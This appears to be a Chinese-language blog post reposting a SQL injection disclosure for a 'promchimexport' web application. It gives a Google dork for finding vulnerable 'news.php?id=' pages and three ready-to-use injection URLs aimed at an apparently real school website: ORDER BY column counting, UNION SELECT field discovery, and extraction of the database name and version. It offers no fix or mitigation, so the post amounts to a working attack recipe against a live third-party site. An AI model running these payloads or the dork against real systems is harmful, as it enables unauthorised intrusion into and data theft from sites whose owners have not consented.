promchimexport SQL注入漏洞技术分析

本文详细披露了在promchimexport应用中发现的一处SQL注入漏洞,提供了具体的漏洞验证方法、Google搜索关键词以及分步注入测试过程,揭示了数据库结构和版本信息的提取方式。

promchimexport - SQL注入

2025年12月24日 提交者: javad rashidi

风险等级:本地利用:远程利用:CVE编号: N/A CWE编号: N/A Google搜索关键词: inurl:"news.php?id="

漏洞信息

漏洞标题: promchimexport - SQL注入 发现日期: 2025-12-23 漏洞作者: javad rashidi 测试平台: Windows,Linux Google搜索关键词: inurl:"news.php?id="

漏洞验证与利用示例

以下是通过构造特定参数对目标网站进行SQL注入测试的示例URL,展示了从探测到信息提取的过程:

  1. 判断字段数量

    1
    
    https://paramekkavuvidyamandir.edu.in/news.php?id=129%27+order+by+8--+
    

    此链接用于判断当前查询语句中使用的字段数量(本例中通过递增order by后的数字进行探测,最终确认有8个字段)。

  2. 确定显示位

    1
    
    https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,2,3,4,5,6,7,8--+
    

    此链接将原始查询结果设置为空(id=-129),并联合查询18的数字,目的是找出在网页前端显示出来的字段位置(即“显示位”)。

  3. 提取关键信息

    1
    
    https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,database(),version(),4,5,6,7,8--+
    

    在确定了显示位(例如位置2和3)后,构造此链接,利用union select语句将数据库名(database())和数据库版本(version())注入到可显示的字段中,从而从服务器获取这些敏感信息。

注意: 所有示例URL中的%27是单引号'的URL编码,--+用于注释掉SQL语句的后续部分。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计